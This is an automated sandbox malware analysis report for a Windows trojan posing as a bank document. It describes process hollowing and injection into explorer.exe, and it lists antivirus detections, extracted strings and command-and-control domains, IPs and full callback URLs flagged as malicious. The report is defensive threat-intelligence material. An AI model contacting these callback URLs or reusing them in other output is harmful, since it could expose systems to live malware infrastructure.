          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 630121 Sample: Document de bancobpi_66473474.exe Startdate: 19/05/2022 Architecture: WINDOWS Score: 100 33 www.tempepdf.com 2->33 35 www.multimediaroomandboard.com 2->35 37 8 other IPs or domains 2->37 41 Snort IDS alert for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 9 other signatures 2->47 11 Document de bancobpi_66473474.exe 1 2->11         started        signatures3 process4 process5 13 setup16.exe 11->13         started        signatures6 53 Modifies the context of a thread in another process (thread injection) 13->53 55 Maps a DLL or memory area into another process 13->55 57 Sample uses process hollowing technique 13->57 59 2 other signatures 13->59 16 explorer.exe 13->16 injected process7 dnsIp8 27 paulstilingroup.com 162.241.253.231, 49818, 80 UNIFIEDLAYER-AS-1US United States 16->27 29 www.bathingsuitsshoppingus.com 185.53.179.92, 49783, 80 TEAMINTERNET-ASDE Germany 16->29 31 7 other IPs or domains 16->31 39 System process connects to network (likely due to code injection or exploit) 16->39 20 msiexec.exe 16->20         started        signatures9 process10 signatures11 49 Modifies the context of a thread in another process (thread injection) 20->49 51 Maps a DLL or memory area into another process 20->51 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Document de bancobpi_66473474.exe4%VirustotalBrowse
          Document de bancobpi_66473474.exe15%ReversingLabsByteCode-MSIL.Packed.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.3.setup16.exe.aa99f8.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          6.2.setup16.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          6.0.setup16.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          6.0.setup16.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          6.0.setup16.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          6.0.setup16.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          www.abtys6.online1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://login.microsoftonline.us0%Avira URL Cloudsafe
          https://sso2urn:ietf:wg:oauth:2.0:oobxhttps://login.microsoftonline.com/common/oauth2/nativeclient0%Avira URL Cloudsafe
          https://aka.msa/msal-net-3x-cache-breaking-change0%Avira URL Cloudsafe
          http://www.ponponshoes.com/arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHD100%Avira URL Cloudmalware
          http://www.bathingsuitsshoppingus.com/arh2/?5j1TIdG=K6jUs0mpPBEML/5NzMDHXY6gxTSHaKTmmlbiXWC1vBmmOSfP0HM5UB/sQ7498az1yFs1&ozr=4hLlIp3xzfzHD100%Avira URL Cloudmalware
          www.abtys6.online/arh2/100%Avira URL Cloudphishing
          http://www.rkhubs.com/arh2/?5j1TIdG=96p+z0lbCXEtn8r3kdhvhAjX1ASZK1voQ/JiiDcNf2/dHgDP8ab1TZBAgNzfa8Mh8PSm&ozr=4hLlIp3xzfzHD0%Avira URL Cloudsafe
          http://james.newtonking.com/projects/json0%URL Reputationsafe
          http://www.cthomassolutions.com/arh2/?5j1TIdG=Dn2b2G7G/trQ3SmQOOzvZCyKhxwSo2sXwRlhdoEbpLnK/FZ0l0AAIUO0K0AUyG9Pn804&ozr=4hLlIp3xzfzHD0%Avira URL Cloudsafe
          https://login.microsoftonline.com=https://login.chinacloudapi.cnAhttps://login.microsoftonline.deAht0%Avira URL Cloudsafe
          http://www.paulstilingroup.com/arh2/?5j1TIdG=sfi/U9uziz3yd+cIlnupVfxmGYoGEUQ+cvnH9JBY/zXkxzDvMNHWuq6jibpyEsrEd8HV&ozr=4hLlIp3xzfzHD0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.defipayout.xyz
          		3.64.163.50
          		truetrue
            		unknown
            www.abtys6.online
            		188.114.96.10
            		truetrueunknown
            ytc5axd6.n.cnamexingzuoy.com
            		156.251.170.8
            		truefalse
              		unknown
              www.ponponshoes.com
              		171.22.26.13
              		truetrue
                		unknown
                paulstilingroup.com
                		162.241.253.231
                		truetrue
                  		unknown
                  www.ginas4t.com
                  		45.82.73.217
                  		truefalse
                    		unknown
                    www.rkhubs.com
                    		154.204.236.66
                    		truetrue
                      		unknown
                      www.bathingsuitsshoppingus.com
                      		185.53.179.92
                      		truetrue
                        		unknown
                        parkingpage.namecheap.com
                        		198.54.117.217
                        		truefalse
                          		high
                          shops.myshopify.com
                          		23.227.38.74
                          		truetrue
                            		unknown
                            www.paulstilingroup.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.tempepdf.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.multimediaroomandboard.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.byzbh63.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.wifitest.info
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.floridasunbreaks.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.fliptheswitch.pro
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.cthomassolutions.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.ponponshoes.com/arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHDtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.bathingsuitsshoppingus.com/arh2/?5j1TIdG=K6jUs0mpPBEML/5NzMDHXY6gxTSHaKTmmlbiXWC1vBmmOSfP0HM5UB/sQ7498az1yFs1&ozr=4hLlIp3xzfzHDtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            www.abtys6.online/arh2/true
                                            • Avira URL Cloud: phishing
                                            		low
                                            http://www.rkhubs.com/arh2/?5j1TIdG=96p+z0lbCXEtn8r3kdhvhAjX1ASZK1voQ/JiiDcNf2/dHgDP8ab1TZBAgNzfa8Mh8PSm&ozr=4hLlIp3xzfzHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.cthomassolutions.com/arh2/?5j1TIdG=Dn2b2G7G/trQ3SmQOOzvZCyKhxwSo2sXwRlhdoEbpLnK/FZ0l0AAIUO0K0AUyG9Pn804&ozr=4hLlIp3xzfzHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.paulstilingroup.com/arh2/?5j1TIdG=sfi/U9uziz3yd+cIlnupVfxmGYoGEUQ+cvnH9JBY/zXkxzDvMNHWuq6jibpyEsrEd8HV&ozr=4hLlIp3xzfzHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://login.microsoftonline.com/common/NBeginDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                              		high
                                              https://aka.ms/msal-net-4x-cache-breaking-changeDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                https://aka.ms/net-cache-pDocument de bancobpi_66473474.exefalse
                                                  		high
                                                  https://login.microsoftonline.com/common/oauth2/nativeclient3urn:ietf:wg:oauth:2.0:oobDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                    		high
                                                    https://aka.ms/net-cache-persistence-errors.Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                      		high
                                                      https://aka.ms/net-cache-persistencDocument de bancobpi_66473474.exefalse
                                                        		high
                                                        http://aka.ms/msal-net-iwaDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                          		high
                                                          https://aka.ms/msal-net-invalid-clientDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            http://aka.ms/valid-authoritiesDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                              		high
                                                              https://aka.ms/msal-client-appsDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                		high
                                                                https://aka.ms/adal_token_cache_serializationDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                  		high
                                                                  https://aka.ms/msal-net-3x-cache-breaking-changeaDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                    		high
                                                                    https://aka.ms/msal-net-enable-keychain-accessDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                      		high
                                                                      https://login.chinacloudapi.cnDocument de bancobpi_66473474.exefalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trustDocument de bancobpi_66473474.exefalse
                                                                          		high
                                                                          https://aka.ms/msal-net-custom-instance-metadataDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                            		high
                                                                            https://aka.ms/msal-net-iwaDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                              		high
                                                                              https://aka.ms/msal-net-up)Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                		high
                                                                                https://aka.ms/msal-net-os-browserxAuthorizeDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                  		high
                                                                                  https://aka.ms/msal-net-customDocument de bancobpi_66473474.exefalse
                                                                                    		high
                                                                                    https://login.microsoftonline.usDocument de bancobpi_66473474.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/07/securitypolicyDocument de bancobpi_66473474.exefalse
                                                                                      		high
                                                                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/IssueDocument de bancobpi_66473474.exefalse
                                                                                        		high
                                                                                        https://login.microsoftonline.comDocument de bancobpi_66473474.exefalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/soap/httpDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                            		high
                                                                                            https://aka.ms/msal-net-4x-cache-breaking-changeuDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                              		high
                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/IssueDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/07/securitypolicyOhttp://schemas.xmlsoap.org/wsdl/soap12/OSerialiDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.nuget.org/packages/Microsoft.Identity.Json.BsonDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                    		high
                                                                                                    https://aka.ms/msal-net-upDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                      		high
                                                                                                      https://sso2urn:ietf:wg:oauth:2.0:oobxhttps://login.microsoftonline.com/common/oauth2/nativeclientDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.msa/msal-net-3x-cache-breaking-changeDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://aka.ms/msal-net-application-configurationDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                            		high
                                                                                                            https://aka.ms/msal-net-3x-cache-breaking-changeDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                              		high
                                                                                                              https://login.microsoftonline.deDocument de bancobpi_66473474.exefalse
                                                                                                                		high
                                                                                                                https://aka.ms/msal-net-b2cDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/BearerDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702Document de bancobpi_66473474.exefalse
                                                                                                                      		high
                                                                                                                      https://aka.ms/msal-net-4x-cache-breaking-changeZDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/09/policyDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueWhttp://schemas.xmlsoap.org/ws/2005/02/trustshtDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://aka.ms/msal-net-3x-cache-breaking-change)Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://aka.ms/msal-net-enable-keychain-groupsDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://aka.ms/msal-net-device-code-floDocument de bancobpi_66473474.exefalse
                                                                                                                                  		high
                                                                                                                                  https://aka.ms/msal-net-ios-brokerDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://aka.ms/msal-net-system-browsersDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://aka.ms/msal-net-cusDocument de bancobpi_66473474.exefalse
                                                                                                                                        		high
                                                                                                                                        https://aka.ms/msal-brokersDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://aka.ms/msal-net-device-code-flowDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJurn:oasis:names:tDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://aka.ms/nDocument de bancobpi_66473474.exefalse
                                                                                                                                                		high
                                                                                                                                                https://aka.ms/msal-net-applDocument de bancobpi_66473474.exefalse
                                                                                                                                                  		high
                                                                                                                                                  https://aka.ms/msal-net-enable-keychaiDocument de bancobpi_66473474.exefalse
                                                                                                                                                    		high
                                                                                                                                                    http://james.newtonking.com/projects/jsonDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/IssueDocument de bancobpi_66473474.exefalse
                                                                                                                                                      		high
                                                                                                                                                      https://aka.ms/msal-net-cliDocument de bancobpi_66473474.exefalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKeyDocument de bancobpi_66473474.exefalse
                                                                                                                                                          		high
                                                                                                                                                          https://aka.ms/msal-net-3-breaking-changesDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://enterpriseregistration.windows.net/Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://aka.ms/adal_token_caDocument de bancobpi_66473474.exefalse
                                                                                                                                                                		high
                                                                                                                                                                https://aka.ms/msal-net-applicDocument de bancobpi_66473474.exefalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://login.microsoftonline.com/common/Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://login.microsoftonline.com/common/oauth2/nativeclientDocument de bancobpi_66473474.exefalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/soap12/Document de bancobpi_66473474.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://aka.ms/msal-interactive-androidDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://aka.ms/msal-net-custom-web-uiVCustomWebUiDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://aka.ms/msal-brokers.Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://aka.ms/net-cache-peDocument de bancobpi_66473474.exefalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/wsdl/Document de bancobpi_66473474.exefalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.newtonsoft.com/jsonschemaDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueDocument de bancobpi_66473474.exefalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://aka.ms/msal-net-2-released)Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://aka.ms/msal-net-os-browserDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://aka.ms/msal-net-client-credentialsDocument de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://aka.ms/msal-net-brokersDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://login.microsoftonline.com=https://login.chinacloudapi.cnAhttps://login.microsoftonline.deAhtDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              		low
                                                                                                                                                                                              https://aka.ms/adal_token_Document de bancobpi_66473474.exefalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://aka.ms/msal-net-3x-cache-breaking-changeuDocument de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://login.microsoftonline.com/commonDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdDocument de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                      		high

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      185.53.179.92
                                                                                                                                                                                                      		www.bathingsuitsshoppingus.comGermany
                                                                                                                                                                                                      		61969TEAMINTERNET-ASDEtrue
                                                                                                                                                                                                      23.227.38.74
                                                                                                                                                                                                      		shops.myshopify.comCanada
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      171.22.26.13
                                                                                                                                                                                                      		www.ponponshoes.comGermany
                                                                                                                                                                                                      		60631PARVASYSTEMIRtrue
                                                                                                                                                                                                      154.204.236.66
                                                                                                                                                                                                      		www.rkhubs.comSeychelles
                                                                                                                                                                                                      		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                                                      162.241.253.231
                                                                                                                                                                                                      		paulstilingroup.comUnited States
                                                                                                                                                                                                      		46606UNIFIEDLAYER-AS-1UStrue

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                      Analysis ID:630121
                                                                                                                                                                                                      Start date and time: 19/05/202214:07:432022-05-19 14:07:43 +02:00
                                                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 12m 49s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Sample file name:Document de bancobpi_66473474.exe
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                      Number of analysed new started processes analysed:28
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • HDC enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal100.troj.expl.evad.winEXE@7/1@16/5
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      HDC Information:
                                                                                                                                                                                                      • Successful, ratio: 60.8% (good quality ratio 55.6%)
                                                                                                                                                                                                      • Quality average: 73%
                                                                                                                                                                                                      • Quality standard deviation: 30.8%
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 72
                                                                                                                                                                                                      • Number of non-executed functions: 149
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Adjust boot time
